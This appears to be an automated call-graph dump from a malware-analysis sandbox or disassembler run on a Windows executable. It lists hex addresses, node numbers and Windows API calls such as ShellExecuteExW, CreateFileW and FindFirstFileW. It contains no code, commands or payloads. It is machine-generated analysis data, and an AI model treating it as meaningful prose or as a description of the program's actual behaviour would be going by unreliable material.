29438->29131 29439->29153 29440->29158 29441->29143 29442->29143 29443->29143 29444->29143 29445->29143 29446->29147 29447->29147 29448->29151 29450 24d8c5 29449->29450 29451 24ed0d 49 API calls 29450->29451 29460 24d8d7 29451->29460 29452 24d93e 29453 24d953 29452->29453 29455 24de9a 49 API calls 29452->29455 29458 24eaf3 54 API calls 29453->29458 29463 24d957 29453->29463 29454 24d8e8 29454->29460 29672 24d990 116 API calls __EH_prolog3_GS 29454->29672 29455->29453 29459 24d973 29458->29459 29461 24d977 29459->29461 29462 24d982 29459->29462 29460->29452 29460->29454 29460->29463 29465 24ed0d 49 API calls 29460->29465 29673 25846c 61 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29460->29673 29674 2492e6 RaiseException CallUnexpected 29460->29674 29464 24de9a 49 API calls 29461->29464 29466 24ec63 49 API calls 29462->29466 29463->29183 29464->29463 29465->29460 29466->29463 29468->29160 29469->29126 29470->29158 29472 24caa5 29471->29472 29473 24e15b GetFileType 29471->29473 29472->29189 29474 2432d2 80 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29472->29474 29473->29472 29474->29187 29475->29189 29476->29190 29477->29220 29478->29220 29479->29198 29480->29213 29481->29214 29482->29214 29483->29221 29484->29220 29485->29223 29487 24d77d __EH_prolog3 29486->29487 29488 2411dd 28 API calls 29487->29488 29489 24d788 29488->29489 29490 252af9 141 API calls 29489->29490 29496 24d7b1 29490->29496 29491 24d804 29493 24d828 29491->29493 29683 2419a9 26 API calls 29491->29683 29493->29220 29495 252af9 141 API calls 29495->29496 29496->29491 29496->29495 29675 252ce5 29496->29675 29497->29226 29498->29235 29499->29166 29500->29122 29501->29158 29502->29158 29503->29158 29511 24790e 29504->29511 29506 247c1d 29506->29340 29508 24790e 47 API calls 29508->29506 29509->29340 29510->29345 29512 25106b 45 API calls 29511->29512 29529 247989 _wcslen 29512->29529 29513 247b1b 29518 247b4a 29513->29518 29542 2419a9 26 API calls 29513->29542 29514 265734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29517 247bbb 29514->29517 29517->29506 29517->29508 29519 247b92 29518->29519 29543 2419a9 26 API calls 29518->29543 29519->29514 29520 252117 45 API calls 29520->29529 29521 247673 28 API calls 29521->29529 29523 25106b 45 API calls 29523->29529 29524 24769f 45 API calls 29524->29529 29526 247bc2 29528 241a66 26 API calls 29526->29528 29527 241a66 26 API calls 29527->29529 29530 247bc7 29528->29530 29529->29513 29529->29520 29529->29521 29529->29523 29529->29524 29529->29526 29529->29527 29533 251a9f 29529->29533 29537 241b63 29529->29537 29541 247bd6 30 API calls 29529->29541 29531 241a66 26 API calls 29530->29531 29531->29513 29534 251ab1 29533->29534 29544 2496e5 29534->29544 29538 241b8e 29537->29538 29539 241b6f 29537->29539 29552 2413f7 28 API calls 29538->29552 29539->29529 29541->29529 29542->29518 29543->29519 29545 2496f1 _wcslen 29544->29545 29548 2490f4 29545->29548 29551 249137 __cftof 29548->29551 29549 265734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29550 2491a9 29549->29550 29550->29529 29551->29549 29552->29539 29553->29360 29554->29358 29555->29366 29556->29365 29557->29376 29559 24ed2b __EH_prolog3_GS 29558->29559 29560 24ed38 GetFileAttributesW 29559->29560 29561 24ed46 29560->29561 29568 24edad 29560->29568 29563 25169a 47 API calls 29561->29563 29562 265787 5 API calls 29564 24edc3 29562->29564 29565 24ed68 29563->29565 29564->29383 29566 24ed78 GetFileAttributesW 29565->29566 29567 24ed81 29565->29567 29566->29567 29567->29568 29575 2419a9 26 API calls 29567->29575 29568->29562 29570->29379 29571->29382 29572->29385 29573->29389 29574->29394 29575->29568 29576->29405 29577->29416 29594 2597a4 29578->29594 29580 25b78e __InternalCxxFrameHandler 29580->29580 29582 25bb9c 29580->29582 29599 252af9 29580->29599 29610 257590 29580->29610 29616 25a008 141 API calls 29580->29616 29617 25bc05 141 API calls 29580->29617 29618 2577cf 29580->29618 29622 259a2b 120 API calls 29580->29622 29623 25c27f 146 API calls 29580->29623 29624 25a814 120 API calls __InternalCxxFrameHandler 29582->29624 29584 25bbb5 __InternalCxxFrameHandler 29585 265734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29584->29585 29586 25bbfc 29585->29586 29586->29420 29593->29420 29597 2597b0 __EH_prolog3 __cftof 29594->29597 29595 259896 29595->29580 29596 26d08c ___std_exception_copy 21 API calls 29596->29597 29597->29595 29597->29596 29625 249384 80 API calls 29597->29625 29607 252b0f __InternalCxxFrameHandler 29599->29607 29600 252c7f 29601 252cb3 29600->29601 29626 252ab0 29600->29626 29603 252cd4 29601->29603 29632 2482a0 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 29601->29632 29633 2573f8 29603->29633 29607->29600 29608 252c76 29607->29608 29630 24fe6f 114 API calls __EH_prolog3 29607->29630 29631 25cdb4 126 API calls __EH_prolog3_GS 29607->29631 29608->29580 29611 2575a1 29610->29611 29612 25759c 29610->29612 29614 2575b1 29611->29614 29615 2577cf 104 API calls 29611->29615 29649 257628 29612->29649 29614->29580 29615->29614 29616->29580 29617->29580 29619 257806 29618->29619 29620 2577db ResetEvent ReleaseSemaphore 29618->29620 29619->29580 29664 2575ed WaitForSingleObject 29620->29664 29622->29580 29623->29580 29624->29584 29625->29597 29627 252af5 29626->29627 29628 252ab8 29626->29628 29627->29601 29628->29627 29639 258618 29628->29639 29630->29607 29631->29607 29632->29603 29634 2573ff 29633->29634 29635 25741a 29634->29635 29647 2492e6 RaiseException CallUnexpected 29634->29647 29637 25742b SetThreadExecutionState 29635->29637 29648 2492e6 RaiseException CallUnexpected 29635->29648 29637->29608 29642 264231 29639->29642 29643 2560d5 29642->29643 29644 264248 SendDlgItemMessageW 29643->29644 29645 260678 PeekMessageW GetMessageW IsDialogMessageW TranslateMessage DispatchMessageW 29644->29645 29646 258638 29645->29646 29646->29627 29647->29635 29648->29637 29650 2576a1 29649->29650 29651 257633 29649->29651 29650->29611 29651->29650 29652 257638 CreateThread 29651->29652 29653 257690 SetThreadPriority 29651->29653 29657 2492eb 100 API calls __EH_prolog3_GS 29651->29657 29658 249500 100 API calls __EH_prolog3_GS 29651->29658 29659 2492e6 RaiseException CallUnexpected 29651->29659 29652->29651 29660 257760 29652->29660 29653->29651 29657->29651 29658->29651 29659->29651 29663 25776e 107 API calls 29660->29663 29662 257769 29663->29662 29665 257624 29664->29665 29666 2575fe GetLastError 29664->29666 29665->29619 29670 2492eb 100 API calls __EH_prolog3_GS 29666->29670 29668 257618 29671 2492e6 RaiseException CallUnexpected 29668->29671 29670->29668 29671->29665 29672->29454 29673->29460 29674->29460 29676 252d18 29675->29676 29678 252cfe __InternalCxxFrameHandler 29675->29678 29676->29678 29684 24e948 29676->29684 29679 252d42 29678->29679 29701 24fe6f 114 API calls __EH_prolog3 29678->29701 29681 2573f8 2 API calls 29679->29681 29682 252d47 29681->29682 29682->29496 29683->29493 29685 24e954 __EH_prolog3_GS 29684->29685 29686 24e963 29685->29686 29687 24e976 GetStdHandle 29685->29687 29699 24e988 29685->29699 29688 265787 5 API calls 29686->29688 29687->29699 29690 24eaab 29688->29690 29689 24e9df WriteFile 29689->29699 29690->29678 29691 24e9ad 29692 24e9af WriteFile 29691->29692 29691->29699 29692->29691 29692->29699 29694 24ea77 29695 2414a7 28 API calls 29694->29695 29696 24ea84 29695->29696 29703 249653 100 API calls 29696->29703 29698 24ea97 29700 241a66 26 API calls 29698->29700 29699->29686 29699->29689 29699->29691 29699->29692 29699->29694 29702 249230 102 API calls 29699->29702 29700->29686 29701->29679 29702->29699 29703->29698 29705->29244 29707->29262 29709 24f835 __EH_prolog3_GS 29708->29709 29710 24f925 FindNextFileW 29709->29710 29711 24f847 FindFirstFileW 29709->29711 29712 24f937 GetLastError 29710->29712 29713 24f948 29710->29713 29711->29713 29715 24f86a 29711->29715 29731 24f90d 29712->29731 29719 2414a7 28 API calls 29713->29719 29716 25169a 47 API calls 29715->29716 29717 24f88c 29716->29717 29720 24f8ac 29717->29720 29723 24f89c FindFirstFileW 29717->29723 29724 24f899 29717->29724 29718 265787 5 API calls 29721 24f733 29718->29721 29722 24f95f 29719->29722 29730 24f8e8 29720->29730 29732 2419a9 26 API calls 29720->29732 29721->29033 29721->29036 29733 25229d 29722->29733 29723->29720 29724->29723 29727 24f902 GetLastError 29727->29731 29729 241a66 26 API calls 29729->29731 29730->29713 29730->29727 29731->29718 29732->29730 29734 2522a6 29733->29734 29737 25236c 29734->29737 29738 252378 29737->29738 29741 25238e 29738->29741 29740 24f970 29740->29729 29742 2524e5 29741->29742 29745 2523a4 29741->29745 29749 2458cb 45 API calls 29742->29749 29747 2523bc 29745->29747 29748 250c7f 28 API calls 29745->29748 29747->29740 29748->29747 29752 24d6e5 29750->29752 29753 24d70b 29750->29753 29752->29753 29755 24ec63 49 API calls 29752->29755 29786 24d89e 29753->29786 29755->29752 29756 24b231 26 API calls 29757 24d74c 29756->29757 29758 241a66 26 API calls 29757->29758 29759 24d755 29758->29759 29760 241a66 26 API calls 29759->29760 29761 24d75e 29760->29761 29762 265734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29761->29762 29763 24b1bf 29762->29763 29763->28936 29770 25909b 29763->29770 29765 2528bb 29764->29765 29791 24fb8e 29765->29791 29767 2528ed 29768 24fb8e 109 API calls 29767->29768 29769 2528f8 29768->29769 29771 2590aa 29770->29771 29772 2574ec 109 API calls 29771->29772 29773 2590b9 29771->29773 29772->29773 29802 254264 26 API calls 29773->29802 29775 2590e8 29803 254264 26 API calls 29775->29803 29777 2590f3 29804 254264 26 API calls 29777->29804 29779 2590fe 29805 254288 26 API calls 29779->29805 29781 259132 29782 242e8b 26 API calls 29781->29782 29783 25913a 29782->29783 29784 242e8b 26 API calls 29783->29784 29785 259142 29784->29785 29787 24d714 29786->29787 29788 24d8a8 29786->29788 29787->29756 29790 24ae77 26 API calls 29788->29790 29790->29787 29792 24fbbb 29791->29792 29794 24fbc2 29791->29794 29795 2574ec 29792->29795 29794->29767 29796 2577cf 104 API calls 29795->29796 29797 257518 ReleaseSemaphore 29796->29797 29798 257556 DeleteCriticalSection CloseHandle CloseHandle 29797->29798 29799 257538 29797->29799 29798->29794 29800 2575ed 102 API calls 29799->29800 29801 257542 CloseHandle 29800->29801 29801->29798 29801->29799 29802->29775 29803->29777 29804->29779 29805->29781 29815 25eac4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 29806->29815 29808 25eaad 29809 25eab9 29808->29809 29816 25eae5 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 29808->29816 29809->28556 29809->28557 29811->28562 29812->28569 29813->28569 29814->28569 29815->29808 29816->29809 29817->28573 29818->28576 29819->28588 29821 24e910 101 API calls 29820->29821 29822 242dc7 29821->29822 29823 242de4 29822->29823 29824 2427e0 124 API calls 29822->29824 29823->28597 29823->28598 29825 242dd4 29824->29825 29825->29823 29831 24204b 80 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29825->29831 29828 242797 29827->29828 29829 24279b 29827->29829 29828->28603 29832 2426d2 29829->29832 29831->29823 29833 242721 29832->29833 29834 2426e4 29832->29834 29840 245767 29833->29840 29835 2452d8 124 API calls 29834->29835 29838 242704 29835->29838 29838->29828 29841 245770 29840->29841 29842 2452d8 124 API calls 29841->29842 29843 242742 29841->29843 29844 2573f8 2 API calls 29841->29844 29842->29841 29843->29838 29845 242c30 29843->29845 29844->29841 29846 242c3c __EH_prolog3_GS 29845->29846 29867 245365 29846->29867 29848 242c8f 29857 242d02 29848->29857 29903 2419a9 26 API calls 29848->29903 29849 265787 5 API calls 29852 242d18 29849->29852 29850 242c5a 29850->29848 29853 242c86 29850->29853 29854 242c91 29850->29854 29852->29838 29899 25888c 28 API calls 29853->29899 29855 242cb9 29854->29855 29856 242c9a 29854->29856 29901 258707 29 API calls 2 library calls 29855->29901 29900 25880e 28 API calls __EH_prolog3 29856->29900 29857->29849 29860 242ca7 29861 2425a4 26 API calls 29860->29861 29863 242caf 29861->29863 29865 241a66 26 API calls 29863->29865 29864 242cd2 29902 242ed0 26 API calls 29864->29902 29865->29848 29868 245380 29867->29868 29869 2453ae 29868->29869 29870 2453ca 29868->29870 29904 24204b 80 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29869->29904 29872 245634 29870->29872 29875 2453f6 29870->29875 29910 24204b 80 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29872->29910 29874 2453b9 29876 265734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29874->29876 29875->29874 29878 259625 80 API calls 29875->29878 29877 245659 29876->29877 29877->29850 29884 245449 29878->29884 29879 24547b 29881 24550d 29879->29881 29898 245472 29879->29898 29907 252a36 106 API calls 29879->29907 29880 245477 29880->29879 29906 24315d 28 API calls 29880->29906 29882 24fd70 28 API calls 29881->29882 29886 245520 29882->29886 29883 245467 29905 24204b 80 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29883->29905 29884->29879 29884->29880 29884->29883 29890 2455b9 29886->29890 29891 2455a9 29886->29891 29888 25909b 109 API calls 29888->29874 29893 2594ea 146 API calls 29890->29893 29892 24d771 146 API calls 29891->29892 29894 2455b7 29892->29894 29893->29894 29908 24fd28 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29894->29908 29896 2455f1 29896->29898 29909 2432d2 80 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29896->29909 29898->29888 29899->29848 29900->29860 29901->29864 29902->29848 29903->29857 29904->29874 29905->29898 29906->29879 29907->29881 29908->29896 29909->29898 29910->29874 29912 260693 GetMessageW 29911->29912 29913 2606cc GetDlgItem 29911->29913 29914 2606b8 TranslateMessage DispatchMessageW 29912->29914 29915 2606a9 IsDialogMessageW 29912->29915 29913->28621 29913->28623 29914->29913 29915->29913 29915->29914 29917 247493 29916->29917 29920 247441 29916->29920 29927 241a92 28 API calls 29917->29927 29924 24744c 29920->29924 29925 2412d3 28 API calls Concurrency::cancel_current_task 29920->29925 29922 247471 29926 2411b8 28 API calls 29922->29926 29924->28629 29925->29922 29926->29924 29929 2568e0 __EH_prolog3_GS 29928->29929 29943 25663b 29929->29943 29934 256929 29941 25696e 29934->29941 29956 256a3d 29934->29956 29959 247ff0 28 API calls 29934->29959 29936 25698e 29940 2569d2 29936->29940 29961 2419a9 26 API calls 29936->29961 29937 265787 5 API calls 29939 2569e8 29937->29939 29939->28277 29940->29937 29941->29936 29960 247ff0 28 API calls 29941->29960 29944 2566df 29943->29944 29945 256651 29943->29945 29947 24adcc 29944->29947 29945->29944 29946 241b63 28 API calls 29945->29946 29946->29945 29948 24ae43 29947->29948 29951 24addd 29947->29951 29964 241a92 28 API calls 29948->29964 29955 24ade8 29951->29955 29962 2412d3 28 API calls Concurrency::cancel_current_task 29951->29962 29953 24ae17 29963 2411b8 28 API calls 29953->29963 29955->29934 29965 24f68d 29956->29965 29959->29934 29960->29936 29961->29940 29962->29953 29963->29955 29966 24f6a4 __vswprintf_c_l 29965->29966 29969 26cee1 29966->29969 29972 26afa4 29969->29972 29973 26afe4 29972->29973 29974 26afcc 29972->29974 29973->29974 29976 26afec 29973->29976 29989 2701d3 20 API calls _abort 29974->29989 29991 26b543 38 API calls 2 library calls 29976->29991 29977 26afd1 29990 26ac8e 26 API calls _abort 29977->29990 29980 26affc 29992 26b50e 20 API calls 2 library calls 29980->29992 29981 265734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29983 24f6ae 29981->29983 29983->29934 29984 26b074 29993 26b8f3 51 API calls 4 library calls 29984->29993 29987 26afdc 29987->29981 29988 26b07f 29994 26b5c6 20 API calls _free 29988->29994 29989->29977 29990->29987 29991->29980 29992->29984 29993->29988 29994->29987 29995 264b8a 29996 264b33 29995->29996 29997 264fce ___delayLoadHelper2@8 17 API calls 29996->29997 29997->29996 29998 24e3d5 30004 24e3df 29998->30004 29999 265734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 30000 24e481 29999->30000 30001 24e551 SetFilePointer 30002 24e56e GetLastError 30001->30002 30003 24e403 30001->30003 30002->30003 30003->29999 30004->30001 30004->30003 30005 266452 30006 26645e ___scrt_is_nonwritable_in_current_image 30005->30006 30037 265e63 30006->30037 30008 266465 30009 2665b8 30008->30009 30012 26648f 30008->30012 30140 266878 4 API calls 2 library calls 30009->30140 30011 2665bf 30133 26ee14 30011->30133 30023 2664ce ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 30012->30023 30048 26f9ad 30012->30048 30018 2664ae 30021 26652f 30056 266993 GetStartupInfoW __cftof 30021->30056 30023->30021 30136 26e9b0 38 API calls 2 library calls 30023->30136 30024 266535 30057 26f8fe 51 API calls 30024->30057 30027 26653d 30058 26454a 30027->30058 30031 266551 30031->30011 30032 266555 30031->30032 30033 26655e 30032->30033 30138 26edb7 28 API calls _abort 30032->30138 30139 265fd4 12 API calls ___scrt_uninitialize_crt 30033->30139 30036 266566 30036->30018 30038 265e6c 30037->30038 30142 266694 IsProcessorFeaturePresent 30038->30142 30040 265e78 30143 2696d9 10 API calls 2 library calls 30040->30143 30042 265e7d 30043 265e81 30042->30043 30144 26f837 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 30042->30144 30043->30008 30045 265e8a 30046 265e98 30045->30046 30145 2696f8 7 API calls 2 library calls 30045->30145 30046->30008 30049 26f9c4 30048->30049 30050 265734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 30049->30050 30051 2664a8 30050->30051 30051->30018 30052 26f951 30051->30052 30053 26f980 30052->30053 30054 265734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 30053->30054 30055 26f9a9 30054->30055 30055->30023 30056->30024 30057->30027 30146 256d7b 30058->30146 30061 251309 30 API calls 30062 264572 30061->30062 30228 25f4d4 30062->30228 30064 26457b __cftof 30232 25f89a 30064->30232 30068 264608 GetCommandLineW 30069 264618 30068->30069 30070 2646f9 30068->30070 30072 2414a7 28 API calls 30069->30072 30071 2513f9 29 API calls 30070->30071 30073 264703 30071->30073 30074 264622 30072->30074 30075 2425a4 26 API calls 30073->30075 30076 2619ee 106 API calls 30074->30076 30077 264710 30075->30077 30078 26462c 30076->30078 30079 241a66 26 API calls 30077->30079 30080 241a66 26 API calls 30078->30080 30081 264719 SetEnvironmentVariableW GetLocalTime 30079->30081 30082 264635 30080->30082 30086 24f6ba _swprintf 51 API calls 30081->30086 30084 264642 OpenFileMappingW 30082->30084 30085 2646dc 30082->30085 30088 2646d2 CloseHandle 30084->30088 30089 26465b MapViewOfFile 30084->30089 30087 2414a7 28 API calls 30085->30087 30090 26477e SetEnvironmentVariableW GetModuleHandleW LoadIconW 30086->30090 30091 2646e6 30087->30091 30088->30070 30089->30088 30092 26466b UnmapViewOfFile MapViewOfFile 30089->30092 30093 2607e5 34 API calls 30090->30093 30094 263efc 30 API calls 30091->30094 30092->30088 30095 264689 30092->30095 30097 2647bc 30093->30097 30098 2646f0 30094->30098 30096 25fc38 28 API calls 30095->30096 30100 264699 30096->30100 30101 253538 124 API calls 30097->30101 30099 241a66 26 API calls 30098->30099 30099->30070 30102 263efc 30 API calls 30100->30102 30103 2647cc 30101->30103 30105 2646a2 30102->30105 30104 25d255 28 API calls 30103->30104 30106 2647d8 30104->30106 30107 255109 105 API calls 30105->30107 30108 25d255 28 API calls 30106->30108 30109 2646b5 30107->30109 30110 2647e1 DialogBoxParamW 30108->30110 30111 2551bf 105 API calls 30109->30111 30112 25d347 26 API calls 30110->30112 30113 2646c0 30111->30113 30114 26481e 30112->30114 30116 2646cb UnmapViewOfFile 30113->30116 30115 25d347 26 API calls 30114->30115 30117 26482a 30115->30117 30116->30088 30118 264833 Sleep 30117->30118 30119 26483a 30117->30119 30118->30119 30120 264848 30119->30120 30121 25fb4b 48 API calls 30119->30121 30122 264852 DeleteObject 30120->30122 30121->30120 30123 264867 DeleteObject 30122->30123 30124 26486e 30122->30124 30123->30124 30125 2648b0 30124->30125 30126 26489e 30124->30126 30129 25f53a GdiplusShutdown CoUninitialize 30125->30129 30127 263fcf 6 API calls 30126->30127 30128 2648a4 CloseHandle 30127->30128 30128->30125 30130 2648ea 30129->30130 30131 265734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 30130->30131 30132 2648fd 30131->30132 30137 2669c9 GetModuleHandleW 30132->30137 30298 26eb91 30133->30298 30136->30021 30137->30031 30138->30033 30139->30036 30140->30011 30142->30040 30143->30042 30144->30045 30145->30043 30248 265b20 30146->30248 30149 256dd3 GetProcAddress 30152 256de5 30149->30152 30153 256dfd GetProcAddress 30149->30153 30150 256e28 30151 25719b 30150->30151 30279 26e50e 42 API calls __vsnwprintf_l 30150->30279 30156 2513f9 29 API calls 30151->30156 30152->30153 30153->30150 30154 256e0f 30153->30154 30154->30150 30158 2571a6 30156->30158 30157 257098 30157->30151 30160 2513f9 29 API calls 30157->30160 30159 252117 45 API calls 30158->30159 30182 2571ba 30159->30182 30161 2570ac 30160->30161 30162 2570bd CreateFileW 30161->30162 30163 2570ba 30161->30163 30165 257186 CloseHandle 30162->30165 30166 2570db SetFilePointer 30162->30166 30163->30162 30168 241a66 26 API calls 30165->30168 30166->30165 30167 2570ed ReadFile 30166->30167 30167->30165 30169 257109 30167->30169 30170 257199 30168->30170 30172 2573f2 30169->30172 30173 25711a 30169->30173 30170->30151 30171 2414a7 28 API calls 30171->30182 30285 265ce1 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 30172->30285 30175 2414a7 28 API calls 30173->30175 30183 257133 30175->30183 30177 25229d 45 API calls 30177->30182 30178 2573f7 30179 2571de CompareStringW 30179->30182 30180 241a66 26 API calls 30180->30182 30182->30171 30182->30177 30182->30179 30182->30180 30184 24ed1f 49 API calls 30182->30184 30202 257248 30182->30202 30250 25067e 30182->30250 30255 256c5e 30182->30255 30185 257176 30183->30185 30190 256c5e 30 API calls 30183->30190 30280 256366 30183->30280 30184->30182 30189 241a66 26 API calls 30185->30189 30186 257292 30187 2573bd 30186->30187 30188 25729e 30186->30188 30192 241a66 26 API calls 30187->30192 30284 252187 45 API calls 30188->30284 30193 25717e 30189->30193 30190->30183 30196 2573c5 30192->30196 30197 241a66 26 API calls 30193->30197 30194 2414a7 28 API calls 30194->30202 30195 2572a7 30200 25067e 6 API calls 30195->30200 30198 241a66 26 API calls 30196->30198 30197->30165 30201 2573cd 30198->30201 30199 25229d 45 API calls 30199->30202 30203 2572ac 30200->30203 30206 265734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 30201->30206 30202->30186 30202->30194 30202->30199 30207 241a66 26 API calls 30202->30207 30213 24ed1f 49 API calls 30202->30213 30204 2572b3 30203->30204 30205 257332 30203->30205 30208 256c5e 30 API calls 30204->30208 30209 256a25 53 API calls 30205->30209 30210 2573e8 30206->30210 30207->30202 30211 2572bd 30208->30211 30212 25735b AllocConsole 30209->30212 30210->30061 30214 256c5e 30 API calls 30211->30214 30215 257368 GetCurrentProcessId AttachConsole 30212->30215 30227 257310 30212->30227 30213->30202 30216 2572c7 30214->30216 30217 257383 30215->30217 30218 254318 53 API calls 30216->30218 30222 25738c GetStdHandle WriteConsoleW Sleep FreeConsole 30217->30222 30219 2572ec 30218->30219 30221 256a25 53 API calls 30219->30221 30220 2573b5 ExitProcess 30223 2572f6 30221->30223 30222->30227 30224 254318 53 API calls 30223->30224 30225 257307 30224->30225 30226 2414a7 28 API calls 30225->30226 30226->30227 30227->30220 30229 256c5e 30 API calls 30228->30229 30230 25f4e8 OleInitialize 30229->30230 30231 25f50b GdiplusStartup SHGetMalloc 30230->30231 30231->30064 30233 2425a4 26 API calls 30232->30233 30234 25f8a8 30233->30234 30235 2425a4 26 API calls 30234->30235 30236 25f8b4 30235->30236 30237 2425a4 26 API calls 30236->30237 30238 25f8c0 30237->30238 30239 2425a4 26 API calls 30238->30239 30240 25f8cc 30239->30240 30241 25f84c 30240->30241 30242 241a66 26 API calls 30241->30242 30243 25f857 30242->30243 30244 241a66 26 API calls 30243->30244 30245 25f85f 30244->30245 30246 241a66 26 API calls 30245->30246 30247 25f867 30246->30247 30249 256d8d GetModuleHandleW 30248->30249 30249->30149 30249->30150 30251 2506a4 GetVersionExW 30250->30251 30252 2506d1 30250->30252 30251->30252 30253 265734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 30252->30253 30254 2506fa 30253->30254 30254->30182 30256 256c6a __EH_prolog3_GS 30255->30256 30257 2656f6 28 API calls 30256->30257 30258 256c77 30257->30258 30259 256c8d GetSystemDirectoryW 30258->30259 30260 256cab 30259->30260 30277 256ca4 30259->30277 30261 2414a7 28 API calls 30260->30261 30262 256ccd 30261->30262 30264 2414a7 28 API calls 30262->30264 30263 256d71 30266 265787 5 API calls 30263->30266 30267 256cda 30264->30267 30265 2412a7 26 API calls 30265->30263 30268 256d78 30266->30268 30286 251ad1 30267->30286 30268->30182 30271 241a66 26 API calls 30272 256cf7 30271->30272 30273 241a66 26 API calls 30272->30273 30274 256cff LoadLibraryW 30273->30274 30276 256d1c 30274->30276 30274->30277 30276->30277 30296 2419a9 26 API calls 30276->30296 30277->30263 30277->30265 30279->30157 30282 256380 30280->30282 30281 2563b7 30281->30183 30282->30281 30283 241b63 28 API calls 30282->30283 30283->30282 30284->30195 30285->30178 30287 251add __EH_prolog3_GS 30286->30287 30288 247673 28 API calls 30287->30288 30289 251aef 30288->30289 30291 251b0c 30289->30291 30297 250ddb 28 API calls 30289->30297 30292 241a66 26 API calls 30291->30292 30293 251b35 30292->30293 30294 265787 5 API calls 30293->30294 30295 251b3a 30294->30295 30295->30271 30296->30277 30297->30291 30299 26eb9d _unexpected 30298->30299 30300 26ebb6 30299->30300 30301 26eba4 30299->30301 30322 2718e1 EnterCriticalSection 30300->30322 30334 26eceb GetModuleHandleW 30301->30334 30304 26eba9 30304->30300 30335 26ed2f GetModuleHandleExW 30304->30335 30308 26ebbd 30317 26ec5b 30308->30317 30319 26ec32 30308->30319 30343 26f6a0 20 API calls _abort 30308->30343 30310 26eca4 30344 278fc0 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 30310->30344 30311 26ec78 30326 26ecaa 30311->30326 30312 26f951 _abort 5 API calls 30312->30317 30316 26f951 _abort 5 API calls 30321 26ec4a 30316->30321 30323 26ec9b 30317->30323 30319->30316 30319->30321 30321->30312 30322->30308 30345 271931 LeaveCriticalSection 30323->30345 30325 26ec74 30325->30310 30325->30311 30346 271d26 30326->30346 30329 26ecd8 30332 26ed2f _abort 8 API calls 30329->30332 30330 26ecb8 GetPEB 30330->30329 30331 26ecc8 GetCurrentProcess TerminateProcess 30330->30331 30331->30329 30333 26ece0 ExitProcess 30332->30333 30334->30304 30336 26ed7c 30335->30336 30337 26ed59 GetProcAddress 30335->30337 30338 26ed82 FreeLibrary 30336->30338 30339 26ed8b 30336->30339 30340 26ed6e 30337->30340 30338->30339 30341 265734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 30339->30341 30340->30336 30342 26ebb5 30341->30342 30342->30300 30343->30319 30345->30325 30347 271d4b 30346->30347 30349 271d41 30346->30349 30353 271948 5 API calls _unexpected 30347->30353 30350 265734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 30349->30350 30351 26ecb4 30350->30351 30351->30329 30351->30330 30352 271d62 30352->30349 30353->30352 30354 24e0b0 30355 24e0c9 30354->30355 30358 24e850 102 API calls 30355->30358 30356 24e0cd 30359 24e850 102 API calls 30356->30359 30357 24e0fb 30358->30356 30359->30357 30360 262813 30361 247673 28 API calls 30360->30361 30368 262832 _wcslen 30361->30368 30362 262af7 30434 2458cb 45 API calls 30362->30434 30363 262a9a 30363->30362 30364 247673 28 API calls 30363->30364 30365 262aec 30364->30365 30392 2638a0 30365->30392 30368->30362 30368->30363 30372 24120c 28 API calls 30368->30372 30374 2628fe 30372->30374 30430 25645a 28 API calls 30374->30430 30378 262a01 30386 262a39 30378->30386 30432 2419a9 26 API calls 30378->30432 30381 26292f 30381->30378 30382 24adaa CompareStringW 30381->30382 30389 2414a7 28 API calls 30381->30389 30390 241a66 26 API calls 30381->30390 30431 25645a 28 API calls 30381->30431 30382->30381 30386->30363 30433 2419a9 26 API calls 30386->30433 30389->30381 30390->30381 30399 2638ac __cftof __EH_prolog3_GS 30392->30399 30393 241a66 26 API calls 30394 263bcf 30393->30394 30395 265787 5 API calls 30394->30395 30396 263bd4 30395->30396 30396->30362 30397 263a1e 30398 2414a7 28 API calls 30397->30398 30401 263a34 30398->30401 30399->30397 30414 263ba8 30399->30414 30441 258da4 CompareStringW 30399->30441 30402 24ed0d 49 API calls 30401->30402 30403 263a41 30402->30403 30404 241a66 26 API calls 30403->30404 30405 263a4b 30404->30405 30406 263a9d ShellExecuteExW 30405->30406 30409 2414a7 28 API calls 30405->30409 30407 263ab2 30406->30407 30408 263b7c 30406->30408 30411 263ae5 WaitForInputIdle 30407->30411 30412 263ace IsWindowVisible 30407->30412 30415 263b30 CloseHandle 30407->30415 30408->30414 30444 2419a9 26 API calls 30408->30444 30410 263a71 30409->30410 30442 250e49 51 API calls 2 library calls 30410->30442 